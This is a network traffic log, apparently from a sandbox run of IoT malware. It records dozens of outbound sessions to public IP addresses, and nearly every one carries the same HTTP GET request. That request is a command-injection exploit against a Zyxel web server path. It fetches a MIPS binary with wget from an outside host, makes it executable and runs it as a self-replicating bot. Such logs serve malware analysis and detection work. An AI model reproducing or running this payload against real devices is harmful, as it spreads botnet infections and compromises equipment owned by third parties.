                                            Jan 14, 2024 15:50:32.288640976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2190192.168.2.235388418.81.39.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288662910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2191192.168.2.2340994125.33.122.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288685083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2192192.168.2.2334364110.214.15.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288743019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2193192.168.2.2343374175.233.161.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288762093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2194192.168.2.2343158190.42.150.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288775921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2195192.168.2.2334724146.192.32.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288801908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2196192.168.2.235392644.76.130.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288841963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2197192.168.2.235685664.12.31.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288881063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2198192.168.2.235434062.101.232.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288907051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2199192.168.2.2342132201.252.98.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288909912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2200192.168.2.2337664147.158.118.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288954020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2201192.168.2.23379561.154.36.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288994074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2202192.168.2.235126612.220.239.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289025068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2203192.168.2.2355304107.141.50.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289047003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2204192.168.2.2355782202.42.24.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289063931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2205192.168.2.234300840.151.177.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289083958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2206192.168.2.2355364156.119.104.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289127111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2207192.168.2.2350804159.181.242.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289150000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2208192.168.2.235479858.200.31.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289194107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2209192.168.2.2333724197.97.215.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289217949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2210192.168.2.234674677.55.218.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289241076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2211192.168.2.235287832.234.29.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289284945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2212192.168.2.235019823.27.123.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289304018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2213192.168.2.2345286155.9.247.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289350986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2214192.168.2.235546641.198.172.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289381027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2215192.168.2.2353880193.151.168.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289391041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2216192.168.2.235616898.119.119.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289455891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2217192.168.2.2351346200.32.126.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289489031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2218192.168.2.2350296198.222.84.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289501905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2219192.168.2.2358894159.193.38.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289570093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2220192.168.2.2343394151.123.82.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289585114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2221192.168.2.2341460177.206.222.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289630890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2222192.168.2.2352488216.252.150.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289649010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2223192.168.2.2336438189.111.76.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289659977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2224192.168.2.2353760128.32.179.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289702892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2225192.168.2.2352874183.202.161.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289726019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2226192.168.2.2354708208.82.127.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289756060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2227192.168.2.2341814132.194.117.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289787054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2228192.168.2.2358504206.93.93.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289799929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2229192.168.2.233999496.133.18.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289813042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2230192.168.2.2336648151.17.211.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289864063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2231192.168.2.235854484.200.65.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289875984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2232192.168.2.233819276.47.242.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289913893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2233192.168.2.2340198109.174.100.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289932966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2234192.168.2.2354216102.242.236.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289940119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2235192.168.2.23411285.82.238.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.289989948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2236192.168.2.233835684.82.216.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290009975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2237192.168.2.2360396216.159.34.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290024996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2238192.168.2.2347744107.18.232.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290057898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2239192.168.2.2347830123.14.103.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290086031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2240192.168.2.2354542185.31.156.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290103912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2241192.168.2.236043013.7.215.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290158987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2242192.168.2.2335436119.4.178.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290167093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2243192.168.2.2344680217.11.108.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290201902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2244192.168.2.2349876117.60.204.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290234089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2245192.168.2.2348332137.163.159.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290265083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2246192.168.2.2357318101.150.31.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290266037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2247192.168.2.2344300154.60.156.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290323019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2248192.168.2.2344310187.222.73.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290330887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2249192.168.2.233540046.184.39.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290359974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2250192.168.2.2345972101.133.246.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290402889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2251192.168.2.233338025.85.75.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290426016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2252192.168.2.2353314116.73.191.33443
                                            TimestampBytes transferredDirectionData
